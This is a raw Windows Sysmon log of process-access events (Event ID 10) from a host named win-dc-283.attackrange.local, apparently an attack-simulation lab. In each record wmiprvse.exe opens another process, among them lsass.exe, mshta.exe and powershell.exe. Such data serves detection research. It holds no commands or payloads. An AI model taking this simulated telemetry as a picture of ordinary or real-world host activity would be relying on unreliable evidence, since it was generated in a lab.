15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024668Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024667Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024666Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024665Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024664Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024663Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024662Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024661Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024660Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024659Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024658Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024657Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535D-6008-4F06-00000000A301}7788C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024656Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535D-6008-4E06-00000000A301}3308C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024655Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-535D-6008-4D06-00000000A301}7188C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024654Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024653Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024652Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024651Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024650Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.069{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024649Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 